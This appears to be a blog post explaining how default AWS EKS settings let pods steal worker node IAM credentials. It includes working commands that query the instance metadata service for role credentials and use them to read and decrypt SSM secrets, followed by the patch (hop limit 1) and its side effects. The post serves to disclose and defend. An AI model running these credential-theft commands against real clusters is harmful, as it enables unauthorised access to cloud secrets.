AWS EKS vulnerability
Before we start, I should clarify that this blog post contains no newly discovered 0‑Day vulnerabilities. It is rather a moment of clarity about how bad an already‑existing, unpatched (N‑Day) vulnerability can be under certain circumstances.
The vulnerability discussed here is that AWS EKS clusters (Kubernetes) by default allow pods to steal worker node credentials. This is bad, but the patch is relatively simple with few side effects. I will take you through how the vulnerability is exploited, an example of what would amplify the impact, how it is patched, and examples of what potentially breaks.
The exploit
When spinning up an AWS EKS cluster, depending on the method used, your worker nodes might end up with a launch template configuration that uses the default instance metadata hop limit of 2. This means that pods can reach the instance metadata service, because its responses are allowed to travel two network hops, which is enough to cross from the node into a pod's network namespace. The instance metadata service is what the EC2 instance (worker node) uses to get information about itself and its environment, including the temporary credentials of its IAM role, and this is where our exploit begins. Assuming you can gain access to the cluster's pods or spin up new ones, be careful if following this example: the credentials, even though temporary, might end up in your logs.
# Spin up a new pod with an interactive shell
kubectl run -n default -i --tty --rm debug --image=alpine:latest --restart=Never -- sh
# Install curl
apk update && apk add curl
# Get a session token from the metadata service (IMDSv2) and store it
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
We have now obtained a token from the metadata service that can be used to retrieve the EC2 instance role name and its credentials. Continuing in the same pod as before:
# Get the EC2 instance role name and store it
ROLE=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/)
# Get the EC2 instance role credentials
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE
We have now obtained a valid set of AWS credentials with the same permission scope as the worker node's EC2 instance role.
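To illustrate what an attacker does next (a sketch with placeholder values, not output from a real cluster): the JSON returned by the last call contains `AccessKeyId`, `SecretAccessKey`, and `Token` fields, which map directly onto the AWS CLI's standard environment variables.

```shell
# Placeholder values; in a real attack these come from the JSON
# returned by the security-credentials endpoint above.
export AWS_ACCESS_KEY_ID="ASIAEXAMPLEKEYID"
export AWS_SECRET_ACCESS_KEY="example-secret-access-key"
export AWS_SESSION_TOKEN="example-session-token"

# Confirm which identity the stolen credentials map to; with live
# credentials this prints the worker node's instance role ARN.
if command -v aws >/dev/null 2>&1; then
  aws sts get-caller-identity || true  # placeholders are rejected, hence || true
fi
```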
The impact
It is very common for AWS EKS worker nodes to have permission to pull container images from ECR, read data from SSM Parameter Store, and more. In environments with predictable parameter naming patterns, an attacker holding only limited list/describe permissions may still be able to read and decrypt specific secrets by guessing their names, which makes the impact more serious than initially expected. Teams that store secrets in SSM Parameter Store rather than Secrets Manager are hit especially hard.
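As a sketch of that amplification, assuming the stolen credentials from the previous step are still exported as environment variables and that the node role has typical read permissions; the parameter path below is hypothetical:

```shell
# Hypothetical secret path following a predictable naming pattern.
PARAM_NAME="/myapp/prod/db-password"

if command -v aws >/dev/null 2>&1; then
  # Enumerate parameter names visible to the node role.
  aws ssm describe-parameters --query 'Parameters[].Name' || true

  # Request the secret directly; --with-decryption returns the
  # plaintext value if the role can use the backing KMS key.
  aws ssm get-parameter --name "$PARAM_NAME" --with-decryption || true
fi
```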
The patch
To prevent pods from accessing the instance metadata service, set the EC2 instance metadata hop limit to 1 in your worker node launch templates. This blocks pod‑level IMDS access while keeping node‑level functionality intact. Be aware that some Kubernetes add‑ons or deployment tooling may rely on IMDS for cluster, network, or storage metadata; these components may need additional configuration, such as supplying explicit parameters or assigning dedicated IAM roles. The exact impact varies between setups, so evaluate this change in a non‑production environment first. Here are the issues I have discovered, but you might encounter more:
- AWS Load Balancer Controller can no longer get the VPC ID, so we need to supply it.
- The EBS CSI driver first attempts to call the metadata service, fails with an error, and then falls back to retrieving the information from the Kubernetes API instead.
- Flux Image Reflector Controller can no longer pull images from ECR, so an IRSA role needs to be supplied.
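The change itself can be scripted with the AWS CLI. The IDs below are placeholders, and requiring IMDSv2 tokens (`HttpTokens: required`) is an additional hardening step commonly paired with the hop limit; for managed node groups, the node group must still be updated to pick up the new launch template version:

```shell
LAUNCH_TEMPLATE_ID="lt-0123456789abcdef0"  # placeholder
INSTANCE_ID="i-0123456789abcdef0"          # placeholder

if command -v aws >/dev/null 2>&1; then
  # Publish a new launch template version that limits metadata
  # responses to a single hop, so they never reach a pod.
  aws ec2 create-launch-template-version \
    --launch-template-id "$LAUNCH_TEMPLATE_ID" \
    --launch-template-data '{"MetadataOptions":{"HttpTokens":"required","HttpPutResponseHopLimit":1}}' || true

  # An already-running instance can also be changed in place.
  aws ec2 modify-instance-metadata-options \
    --instance-id "$INSTANCE_ID" \
    --http-tokens required \
    --http-put-response-hop-limit 1 || true
fi
```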
Disclaimer: This example reflects a generic EKS configuration and is not indicative of any specific environment.